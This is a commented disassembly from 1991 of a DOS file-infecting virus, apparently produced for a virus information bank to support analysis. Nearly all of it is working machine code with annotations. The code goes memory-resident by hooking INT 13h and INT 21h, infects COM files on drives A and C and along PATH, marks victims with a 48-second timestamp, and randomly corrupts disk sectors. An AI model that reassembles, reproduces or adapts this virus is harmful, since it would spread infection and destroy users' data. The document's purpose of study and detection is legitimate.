
;-------------------------------------------------
; Virus
;
; disassembled by Andrzej Kadlof July 1991
;
; (C) Polish section of Virus Information Bank
;------------------------------------------------
0100 E97801 JMP 027B
; old INT 13h vector
0103 7A0F
0105 7000
;====================
; INT 13h handler
0107 9C PUSHF
0108 50 PUSH AX
0109 53 PUSH BX
010A 51 PUSH CX
010B 52 PUSH DX
010C 1E PUSH DS
010D 06 PUSH ES
010E 57 PUSH DI
010F 0E PUSH CS
0110 1F POP DS
0111 50 PUSH AX
0112 B000 MOV AL,00
0114 3D0002 CMP AX,0200 ; request: read sectors?
0117 58 POP AX ; restore oryginal function number
0118 7571 JNZ 018B ; no, exit
011A 80F900 CMP CL,00 ; first sector number (illegal)
011D 7518 JNZ 0137 ; not zero, not virus question
011F 81FF3412 CMP DI,1234 ; question from new copy of virus
0123 7512 JNZ 0137 ; no
; prepare answer for the question from the next virus copy
0125 5F POP DI
0126 BF2143 MOV DI,4321 ; answer: I'm here!
0129 58 POP AX
012A 58 POP AX
012B A19901 MOV AX,[0199] ; old INT 21h
012E 50 PUSH AX
012F A19B01 MOV AX,[019B]
0132 50 PUSH AX
0133 57 PUSH DI
0134 EB55 JMP 018B ; exit
0136 90 NOP
; check cylinder number, if not 4x + 2 or 4x + 3 then exit (x arbitrary)
0137 51 PUSH CX
0138 81E100FC AND CX,FC00
013C 80FD00 CMP CH,00
013F 59 POP CX
0140 7449 JZ 018B ; exit
; check time condition
0142 51 PUSH CX
0143 52 PUSH DX
0144 B80000 MOV AX,0000
0147 FB STI
0148 CD1A INT 1A ; read the clock
014A 81E2FF0F AND DX,0FFF ; low word of tick count since reset
014E 83FA00 CMP DX,+00 ; about 3.7 min
0151 5A POP DX
0152 59 POP CX
0153 7536 JNZ 018B ; exit
;<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
;
; DESTRUCTION! change one byte on the sector on the next track
;
;<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
0155 9C PUSHF
0156 0E PUSH CS ; segment of return address
0157 B86601 MOV AX,0166 ; offset of return address
015A 50 PUSH AX
015B B80102 MOV AX,0201 ; read 1 sector
015E 80C501 ADD CH,01 ; next track
0161 2EFF2E0301 JMP DWORD PTR CS:[0103] ; CALL FAR INT 13h
0166 7223 JB 018B ; exit
; get random number between 0 and 1FFh (minimal buffer size)
0168 51 PUSH CX
0169 52 PUSH DX
016A B80000 MOV AX,0000
016D FB STI
016E CD1A INT 1A ; read the clock
0170 81E2FF01 AND DX,01FF ; low word of tick count since reset
; change one byte inside buffer
0174 53 PUSH BX ; offset of buffer
0175 03DA ADD BX,DX ; random byte in buffer
0177 26880F MOV ES:[BX],CL ; undefined value (first sector)
017A 5B POP BX ; restore buffer address
; write buffer back to disk
017B 5A POP DX ; disk/head
017C 59 POP CX ; track/sector
017D 9C PUSHF
017E 0E PUSH CS ; segment of return address
017F B88B01 MOV AX,018B ; offset of return address
0182 50 PUSH AX
0183 B80103 MOV AX,0301 ; write 1 sector
0186 2EFF2E0301 JMP DWORD PTR CS:[0103] ; CALL FAR INT 13h
; exit to old INT 13h
018B 5F POP DI
018C 07 POP ES
018D 1F POP DS
018E 5A POP DX
018F 59 POP CX
0190 5B POP BX
0191 58 POP AX
0192 9D POPF
0193 2EFF2E0301 JMP DWORD PTR CS:[0103] ; INT 13h
0198 90 NOP
;---------------
; working area
; old INT 21h vector
0199 9E10
019B 1801
019D 26 0D ; segment of environment block
019F 80 00 ; address of command line
01A1 2B 0D ; CS
01A3 5C 00 ; first FCB in PSP
01A5 2B 0D ; CS
01A7 6C 00 ; second FCB in PSP
01A9 2B 0D ; CS
01AB CF 01 ; runtime SP
01AD 2B 0D ; old SS, CS
01AF 02 19 ; old SP
;------------
; local stack
01B1 9D01
01B3 857F
01B5 FF58
01B7 2B0D
01B9 2F01
01BB E37F
01BD D300
01BF 0001
02C1 2C00
01C3 260D
02C5 2B0D
01C7 430C
01C9 2903
01CB 2B0D
01CD 02F2
; end of local stack
;-------------------
01CF 90 NOP
01D0 90 NOP
;=====================
; INT 21h handler
01D1 9C PUSHF
01D2 56 PUSH SI
01D3 50 PUSH AX
01D4 53 PUSH BX
01D5 51 PUSH CX
01D6 52 PUSH DX
01D7 1E PUSH DS
01D8 06 PUSH ES
01D9 57 PUSH DI
01DA 80FC4B CMP AH,4B ; load and execute
01DD 7555 JNZ 0234 ; exit
01DF 1E PUSH DS
01E0 52 PUSH DX
01E1 0E PUSH CS
01E2 1F POP DS
01E3 C70698036906 MOV WORD PTR [0398],0669 ; virus length
01E9 E8E203 CALL 05CE ; intercept INT 24h and prepare local DTA
01EC 5F POP DI
01ED 07 POP ES
01EE 06 PUSH ES
01EF 57 PUSH DI
01F0 B80000 MOV AX,0000
01F3 B98000 MOV CX,0080
01F6 F2AE REPNZ SCASB
01F8 83F900 CMP CX,+00
01FB 7432 JZ 022F
01FD 4F DEC DI
01FE B05C MOV AL,5C ; '\'
0200 4F DEC DI
0201 AE SCASB
0202 75F9 JNZ 01FD
0204 57 PUSH DI
0205 59 POP CX
0206 5E POP SI
0207 1F POP DS
0208 0E PUSH CS
0209 07 POP ES
020A BF6906 MOV DI,0669 ; buffer (area behind virus code)
020D AC LODSB
020E AA STOSB
020F 3BF1 CMP SI,CX
0211 75FA JNZ 020D
0213 0E PUSH CS
0214 1F POP DS
0215 893EA203 MOV [03A2],DI
0219 BEAC03 MOV SI,03AC
021C B90600 MOV CX,0006
021F AC LODSB
0220 AA STOSB
0221 E2FC LOOP 021F
0223 BA6906 MOV DX,0669
0226 E87302 CALL 049C ; find and infect one COM file
0229 E8D703 CALL 0603 ; restore DTA and INT 24h
022C EB06 JMP 0234 ; exit
022E 90 NOP
022F 58 POP AX
0230 58 POP AX
0231 E8CF03 CALL 0603 ; restore DTA and INT 24h
; exit to old INT 21h
0234 90 NOP
0235 5F POP DI
0236 07 POP ES
0237 1F POP DS
0238 5A POP DX
0239 59 POP CX
023A 5B POP BX
023B 58 POP AX
023C 5E POP SI
023D 9D POPF
023E 2EFF2E9901 JMP DWORD PTR CS:[0199]
0243 90 NOP
;------------------------
; prepare Load & Execute
0244 8CC0 MOV AX,ES
0246 8BE8 MOV BP,AX
0248 8BD7 MOV DX,DI ; offset of victim name
024A 8CC8 MOV AX,CS
024C 8EC0 MOV ES,AX ; segment of victim name
024E BB9D01 MOV BX,019D ; run parameters
0251 06 PUSH ES
0252 53 PUSH BX
0253 8CC8 MOV AX,CS ; block segment
0255 8EC0 MOV ES,AX
0257 BBD300 MOV BX,00D3 ; block size in paragraphs
025A B44A MOV AH,4A ; resize memory block
025C CD21 INT 21
; free environment block
025E BF2C00 MOV DI,002C ; address of environment block in PSP
0261 8E05 MOV ES,[DI] ; segment of environment
0263 B80049 MOV AX,4900 ; free memory block
0266 CD21 INT 21
0268 5B POP BX
0269 07 POP ES
026A 58 POP AX
026B 8C0EAD01 MOV [01AD],CS
026F 8E16AD01 MOV SS,[01AD]
0273 8B26AB01 MOV SP,[01AB]
0277 8EDD MOV DS,BP
0279 50 PUSH AX
027A C3 RET
;===========================
; virus entry point
; look for resident part of virus in RAM
; on a system with 3 floppy drives this test may hang the computer
; (unspecified I/O buffer BX)
027B B203 MOV DL,03 ; third floppy drive
027D B600 MOV DH,00 ; head 0
027F B100 MOV CL,00 ; first sector 0
0281 B500 MOV CH,00 ; track
0283 B80102 MOV AX,0201 ; read 1 sector
0286 BF3412 MOV DI,1234 ; is already in memory?
0289 CD13 INT 13
028B 81FF2143 CMP DI,4321 ; expected answer
028F 7503 JNZ 0294 ; memory is clear
0291 E92601 JMP 03BA ; exit
; intercept INT 21h and INT 13h
0294 B82135 MOV AX,3521 ; get INT 21h
0297 CD21 INT 21
0299 891E9901 MOV [0199],BX
029D 8C069B01 MOV [019B],ES
02A1 BAD101 MOV DX,01D1
02A4 B82125 MOV AX,2521 ; set INT 21h
02A7 CD21 INT 21
02A9 B435 MOV AH,35 ; get INT 13h
02AB B013 MOV AL,13
02AD CD21 INT 21
02AF 891E0301 MOV [0103],BX
02B3 8C060501 MOV [0105],ES
02B7 B425 MOV AH,25 ; set INT 13h
02B9 B013 MOV AL,13
02BB BA0701 MOV DX,0107
02BE CD21 INT 21
; prepare Load & Execute
02C0 BF2C00 MOV DI,002C ; address of environment in PSP
02C3 8B05 MOV AX,[DI]
02C5 A39D01 MOV [019D],AX
02C8 8C0EA101 MOV [01A1],CS
02CC C7069F018000 MOV WORD PTR [019F],0080 ; command line
02D2 8C0EA501 MOV [01A5],CS
02D6 C706A3015C00 MOV WORD PTR [01A3],005C ; first FCB in PSP
02DC 8C0EA901 MOV [01A9],CS
02E0 C706A7016C00 MOV WORD PTR [01A7],006C ; second FCB
; look for program name (DOS 3.x or higher)
02E6 FC CLD
02E7 BF2C00 MOV DI,002C ; segment of environment block
02EA 8E05 MOV ES,[DI]
02EC BF0000 MOV DI,0000 ; start of environment
02EF B80000 MOV AX,0000 ; end of block marker
02F2 B90080 MOV CX,8000 ; maxim block size
02F5 2BCF SUB CX,DI ; end of block
02F7 7230 JB 0329 ; not found
02F9 F2AE REPNZ SCASB
02FB B80000 MOV AX,0000
02FE AE SCASB
02FF 75EE JNZ 02EF
0301 B80100 MOV AX,0001
0304 AE SCASB
0305 7522 JNZ 0329
0307 B80000 MOV AX,0000
030A AE SCASB
030B 751C JNZ 0329
030D E834FF CALL 0244 ; prepare Load & Execute
0310 B8004B MOV AX,4B00 ; load and execute
0313 E86F00 CALL 0385 ; INT 21h
; clear environment block
0316 0E PUSH CS
0317 1F POP DS
0318 BF2C00 MOV DI,002C ; environment
031B B80000 MOV AX,0000 ; end of block marker
031E 8905 MOV [DI],AX ; start of block
0320 BAD300 MOV DX,00D3 ; size of virus block in paragraphs
0323 B80031 MOV AX,3100 ; terminate and state resident
0326 E85C00 CALL 0385 ; far call to INT 21h
; victim name not found (DOS < 3.0)
; execute command >C:\COMMAND.COM /P
0329 E818FF CALL 0244 ; prepare Load & Execute
032C 0E PUSH CS
032D 1F POP DS
032E BA7603 MOV DX,0376 ; 'c:\command.com',0
0331 57 PUSH DI
0332 BF8000 MOV DI,0080 ; command line
0335 C705022F MOV WORD PTR [DI],2F02 ; 2, '/'
0339 C74502500D MOV WORD PTR [DI+02],0D50 ; 'P', CR
033E 5F POP DI
033F B8004B MOV AX,4B00 ; load and execute
0342 E84000 CALL 0385 ; far call to INT 21h
0345 B86300 MOV AX,0063 ; 'c'
0348 57 PUSH DI
0349 BF7603 MOV DI,0376 ; 'c:\command.com',0
034C 8805 MOV [DI],AL
034E 5F POP DI
034F B8004B MOV AX,4B00 ; load and execute
0352 E83000 CALL 0385 ; far call to INT 21h
; restore INT 13h
0355 B81325 MOV AX,2513 ; set INT 13h
0358 8B160301 MOV DX,[0103]
035C FF360501 PUSH [0105]
0360 1F POP DS
0361 CD21 INT 21
; restore INT 13h
0363 B82125 MOV AX,2521
0366 8B169901 MOV DX,[0199]
036A FF369B01 PUSH [019B]
036E 1F POP DS
036F CD21 INT 21
0371 0E PUSH CS
0372 1F POP DS
0373 EB45 JMP 03BA
0375 90 NOP
0376 63 3A 5C 43 4F 4D 4D 41 4E 44 2E 43 4F 4D 00 ; c:\COMMAND.COM
;---------------------
; FAR CALL to INT 21h
0385 2E8F069603 POP CS:[0396] ; offset of caller
038A 9C PUSHF ; prepare jump to INT 21h
038B 0E PUSH CS ; segment of return address
038C 2EFF369603 PUSH CS:[0396] ; offset of return addres
0391 2EFF2E9901 JMP DWORD PTR CS:[0199] ; CALL FAR INT 13h
;--------------
; working area
0396 96 05 ; place for offset of return address
0398 60 D2 ; length of victim
039A 80 00 ; old DTA offset
039C C2 0A ; old DTA segment
039E 00 00 ; counter ?
03A0 00 00 ; DS
03A2 FA CC ; working, end of path
03A4 50 41 54 48 3D ; PATH=
03A9 61 3A 5C 2A 2E 63 6F 6D 00 ; a:\*.com, 0
; old INT 24h
03B2 49 01 ; offset
03B4 48 09 ; segment
;==================
; INT 24h handler
03B6 90 NOP
03B7 B003 MOV AL,03
03B9 CF IRET
;---------------------------------
; virus already resident, continue
03BA 06 PUSH ES
03BB 1E PUSH DS
03BC 0E PUSH CS
03BD 1F POP DS
03BE 8F069901 POP [0199] ; old INT 21h offset
03C2 8F069B01 POP [019B] ; old INT 21h segment
03C6 E80502 CALL 05CE ; prepare INT 24h and DTA
03C9 BEA903 MOV SI,03A9 ; address of 'a:\*.com, 0'
03CC 8B3E9803 MOV DI,[0398] ; buffer outside viruse code
03D0 B90900 MOV CX,0009 ; number of bytes
03D3 AC LODSB
03D4 AA STOSB
03D5 E2FC LOOP 03D3
03D7 8B3E9803 MOV DI,[0398] ; buffer
03DB 83C703 ADD DI,+03
03DE 893EA203 MOV [03A2],DI
03E2 8B3E9803 MOV DI,[0398]
03E6 B86100 MOV AX,0061 ; drive 'a'
03E9 8805 MOV [DI],AL ; patch 'a:\*.com', 0
03EB 8BD7 MOV DX,DI ; buffer
03ED E8AC00 CALL 049C ; find and infect one COM program
03F0 BEA903 MOV SI,03A9
03F3 8B3E9803 MOV DI,[0398]
03F7 B90900 MOV CX,0009
03FA AC LODSB
03FB AA STOSB
03FC E2FC LOOP 03FA
03FE 8B3E9803 MOV DI,[0398]
0402 B86300 MOV AX,0063 ; drive 'c'
0405 8805 MOV [DI],AL ; patch 'a:\*.com', 0
0407 8BD7 MOV DX,DI
0409 E89000 CALL 049C ; find and infect one COM program
040C 7203 JB 0411
040E E91302 JMP 0624
0411 BF2C00 MOV DI,002C ; environment
0414 8E05 MOV ES,[DI]
0416 BF0000 MOV DI,0000
0419 BEA403 MOV SI,03A4 ; 'PATH='
041C 46 INC SI
041D B85000 MOV AX,0050 ; 'P'
0420 B90080 MOV CX,8000 ; max block size
0423 2BCF SUB CX,DI
0425 7303 JAE 042A
0427 E9FA01 JMP 0624 ; not found
042A F2AE REPNZ SCASB
042C B90400 MOV CX,0004
042F AC LODSB
0430 AE SCASB
0431 75E6 JNZ 0419
0433 E2FA LOOP 042F
0435 8B369803 MOV SI,[0398]
0439 56 PUSH SI
043A 57 PUSH DI
043B 5E POP SI
043C 5F POP DI
043D 06 PUSH ES
043E 0E PUSH CS
043F 07 POP ES
0440 1F POP DS
0441 AC LODSB
0442 AA STOSB
0443 3C3B CMP AL,3B ; ';' end of path marker
0445 7409 JZ 0450
0447 3C00 CMP AL,00 ; end of block marker
0449 7402 JZ 044D
044B EBF4 JMP 0441 ; end of block
044D BE0000 MOV SI,0000
0450 1E PUSH DS
0451 0E PUSH CS
0452 1F POP DS
0453 8F06A003 POP [03A0]
0457 89369E03 MOV [039E],SI
045B 4F DEC DI
045C 4F DEC DI
; check for last character '\', add if necessary
045D B05C MOV AL,5C ; '\'
045F 3805 CMP [DI],AL
0461 7403 JZ 0466
0463 47 INC DI
0464 8805 MOV [DI],AL
0466 47 INC DI
; form new path ....\*.com, 0
0467 BEAC03 MOV SI,03AC ; *.com
046A 893EA203 MOV [03A2],DI
046E B90600 MOV CX,0006 ; length
0471 AC LODSB
0472 AA STOSB
0473 E2FC LOOP 0471
0475 A19803 MOV AX,[0398] ; buffer
0478 8BD0 MOV DX,AX
047A E81F00 CALL 049C ; find and infect COM file
047D 7203 JB 0482
047F E9A201 JMP 0624
0482 833E9E0300 CMP WORD PTR [039E],+00
0487 7503 JNZ 048C
0489 E99801 JMP 0624
048C A19803 MOV AX,[0398]
048F 8BF8 MOV DI,AX
0491 8B369E03 MOV SI,[039E]
0495 FF36A003 PUSH [03A0]
0499 1F POP DS
049A EBA5 JMP 0441
;---------------------------------
; find and infect one COM program
049C 0E PUSH CS
049D 07 POP ES
049E B8004E MOV AX,4E00 ; find first
04A1 B90300 MOV CX,0003 ; hiden, read only
04A4 E8DEFE CALL 0385 ; far call to INT 21h
04A7 730C JAE 04B5
04A9 C3 RET
04AA B44F MOV AH,4F ; find next
04AC B90300 MOV CX,0003 ; hiden, read only
04AF E8D3FE CALL 0385 ; far call to INT 21h
04B2 7301 JAE 04B5
04B4 C3 RET
; start infection
04B5 8B3E9803 MOV DI,[0398] ; buffer
04B9 81C78000 ADD DI,0080 ; set DI to DTA
04BD 83C71A ADD DI,+1A ; file length
04C0 8B05 MOV AX,[DI]
04C2 2D0010 SUB AX,1000 ; minimum victim size
04C5 7215 JB 04DC ; file too small, find next
04C7 8B05 MOV AX,[DI] ; file size
04C9 2DFFEF SUB AX,EFFF ; maximum file size
04CC 730E JAE 04DC ; file too big, find next
04CE 83EF04 SUB DI,+04 ; file time stamp
04D1 8B05 MOV AX,[DI]
04D3 241F AND AL,1F ; extract seconds
04D5 3C18 CMP AL,18 ; 48 seconds
04D7 7403 JZ 04DC ; infected, find next
04D9 EB03 JMP 04DE ; continue
04DB 90 NOP
04DC EBCC JMP 04AA ; find next
; copy file name to buffer
04DE 83C708 ADD DI,+08
04E1 8BF7 MOV SI,DI
04E3 8B3EA203 MOV DI,[03A2]
04E7 AC LODSB
04E8 AA STOSB
04E9 3C00 CMP AL,00
04EB 75FA JNZ 04E7
; find new file length
04ED 8B3E9803 MOV DI,[0398]
04F1 81C78000 ADD DI,0080 ; set DI to local DTA
04F5 83C71A ADD DI,+1A ; file length
04F8 8B05 MOV AX,[DI]
04FA 056906 ADD AX,0669 ; new file length
04FD FF369803 PUSH [0398]
0501 50 PUSH AX
; clear flag Read Only
0502 8B169803 MOV DX,[0398]
0506 B80043 MOV AX,4300 ; get attributes
0509 E879FE CALL 0385 ; far call to INT 21h
050C 890EC805 MOV [05C8],CX ; store old attributes
0510 81E1FEFF AND CX,FFFE ; clear read only flag
0514 B80143 MOV AX,4301 ; set attributes
0517 E86BFE CALL 0385 ; far call to INT 21h
051A 7233 JB 054F ; error, exit
; open file for read/write
051C B8023D MOV AX,3D02 ; open file for read/write
051F E863FE CALL 0385 ; far call to INT 21h
0522 722B JB 054F ; error, exit
; set 48 second in file time stamp
0524 8BD8 MOV BX,AX ; hundle
0526 B80057 MOV AX,5700 ; get time stamp
0529 E859FE CALL 0385 ; far call to INT 21h
052C 81E1E0FF AND CX,FFE0 ; clear seconds
0530 83C118 ADD CX,+18 ; set to 48
0533 890ECA05 MOV [05CA],CX ; store for later
0537 8916CC05 MOV [05CC],DX
; copy first 669h bytes of file to the end
; read beginning of file (669h bytes)
053B B96906 MOV CX,0669 ; virus length
053E 81E90001 SUB CX,0100 ; size of PSP
0542 8B169803 MOV DX,[0398]
0546 81C20001 ADD DX,0100 ; buffer
054A B43F MOV AH,3F ; read file
054C E836FE CALL 0385 ; far call to INT 21h
054F 7271 JB 05C2 ; error, exit
; move file ptr back to BOF
0551 8BFA MOV DI,DX
0553 BA0000 MOV DX,0000
0556 B90000 MOV CX,0000
0559 B80242 MOV AX,4202 ; move file ptr to EOF
055C E826FE CALL 0385 ; far call to INT 21h
055F 7261 JB 05C2 ; error, exit
; write virus code to file
0561 8BD7 MOV DX,DI
0563 B96906 MOV CX,0669 ; virus length
0566 81E90001 SUB CX,0100
056A B440 MOV AH,40 ; write file
056C E816FE CALL 0385 ; far call to INT 21h
056F 7251 JB 05C2 ; error, exit
; move file ptr to EOF
0571 BA0000 MOV DX,0000
0574 B90000 MOV CX,0000
0577 B80042 MOV AX,4200 ; move file ptr to BOF
057A E808FE CALL 0385 ; far call to INT 21h
057D 7243 JB 05C2
; write to file its beginning block
057F 8F069803 POP [0398]
0583 FF369803 PUSH [0398]
0587 B96906 MOV CX,0669 ; end of virus code
058A 81E90001 SUB CX,0100 ; size of PSP
058E BA0001 MOV DX,0100 ; from buffer
0591 B440 MOV AH,40 ; write file
0593 E8EFFD CALL 0385 ; far call to INT 21h
0596 722A JB 05C2
; error, exit
; restore file time stamp
0598 8B0ECA05 MOV CX,[05CA] ; restore time stamp
059C 8B16CC05 MOV DX,[05CC] ; restore date stamp
05A0 B80157 MOV AX,5701 ; set file time stamp
05A3 E8DFFD CALL 0385 ; far call to INT 21h
; close file
05A6 B43E MOV AH,3E ; close file
05A8 E8DAFD CALL 0385 ; far call to INT 21h
; restore file attributes
05AB 8F069803 POP [0398]
05AF 8F069803 POP [0398]
05B3 8B169803 MOV DX,[0398]
05B7 8B0EC805 MOV CX,[05C8] ; retore file attributes
05BB B80143 MOV AX,4301 ; set file attributes
05BE E8C4FD CALL 0385 ; far call to INT 21h
05C1 C3 RET
; exit after any error
05C2 58 POP AX
05C3 8F069803 POP [0398]
05C7 C3 RET
05C8 20 00 ; file attributes
05CA D8A8 ; file time stamp
05CC D516 ; file date stamp
;-----------------------------------------
; intercept INT 24h and prepare local DTA
; get INT 24h
05CE B82435 MOV AX,3524 ; get INT 24h
05D1 E8B1FD CALL 0385 ; far call to INT 21h
05D4 891EB203 MOV [03B2],BX
05D8 8C06B403 MOV [03B4],ES
; set new INT 24h
05DC B425 MOV AH,25 ; set
05DE B024 MOV AL,24 ; int 24h
05E0 BAB603 MOV DX,03B6 ; offset of new handler
05E3 E89FFD CALL 0385 ; far call to INT 21h
; get current DTA
05E6 B42F MOV AH,2F ; get DTA
05E8 E89AFD CALL 0385 ; far call to INT 21h
05EB 8C069C03 MOV [039C],ES
05EF 891E9A03 MOV [039A],BX
; set new local DTA
05F3 B41A MOV AH,1A ; set DTA
05F5 0E PUSH CS
05F6 1F POP DS
05F7 8B169803 MOV DX,[0398]
05FB 81C28000 ADD DX,0080
05FF E883FD CALL 0385 ; far call to INT 21h
0602 C3 RET
;-------------------------
; restore INT 24h and DTA
; prepare registers
0603 0E PUSH CS
0604 1F POP DS
0605 0E PUSH CS
0606 07 POP ES
; restore INT 24h
0607 B82425 MOV AX,2524 ; set INT 24h
060A 8B16B203 MOV DX,[03B2]
060E 8E1EB403 MOV DS,[03B4]
0612 E870FD CALL 0385 ; far call to INT 21h
; restore DTA
0615 8B169A03 MOV DX,[039A]
0619 FF369C03 PUSH [039C]
061D 1F POP DS
061E B41A MOV AH,1A
0620 E862FD CALL 0385 ; far call to INT 21h
0623 C3 RET
;---------------------
; exit to application
0624 E8DCFF CALL 0603 ; restore INT 24h and DTA
0627 0E PUSH CS
0628 1F POP DS
0629 BE3E06 MOV SI,063E ; start of oryginal code
062C 8B3E9803 MOV DI,[0398] ; length of victim
; copy victim code
0630 AC LODSB
0631 AA STOSB
0632 81FE6906 CMP SI,0669
0636 75F8 JNZ 0630
0638 8B3E9803 MOV DI,[0398] ; RET address
063C 57 PUSH DI
063D C3 RET
063E B96906 MOV CX,0669
0641 81E90001 SUB CX,0100
0645 8B369803 MOV SI,[0398]
0649 2BF1 SUB SI,CX
064B 0E PUSH CS
064C 1F POP DS
064D BF0001 MOV DI,0100
0650 AC LODSB
0651 AA STOSB
0652 E2FC LOOP 0650
0654 33C0 XOR AX,AX
0656 33DB XOR BX,BX
0658 33C9 XOR CX,CX
065A 33D2 XOR DX,DX
065C 33F6 XOR SI,SI
065E BF0001 MOV DI,0100
0661 57 PUSH DI
0662 33FF XOR DI,DI
0664 33ED XOR BP,BP
0666 C3 RET
0667 90 NOP
0668 90 NOP
; end of resident part of virus
;-----------------------------
; victim code